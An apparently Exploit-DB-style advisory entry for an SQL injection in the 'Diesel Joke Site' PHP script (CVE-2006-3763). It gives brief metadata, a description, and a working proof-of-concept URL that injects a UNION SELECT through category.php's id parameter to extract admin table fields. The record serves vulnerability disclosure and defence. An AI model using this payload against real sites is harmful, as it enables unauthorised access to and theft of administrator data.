Diesel Joke Site - 'Category.php' SQL Injection
Author: black-code
type: webapps
platform: php
port:
date_added: 2006-07-01
date_updated: 2016-12-22
verified: 1
codes: CVE-2006-3763;OSVDB-25769
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/18760/info
Diesel Joke Site is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/path to joke script/category.php?id=-99%20union%20select%20name,name,name,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*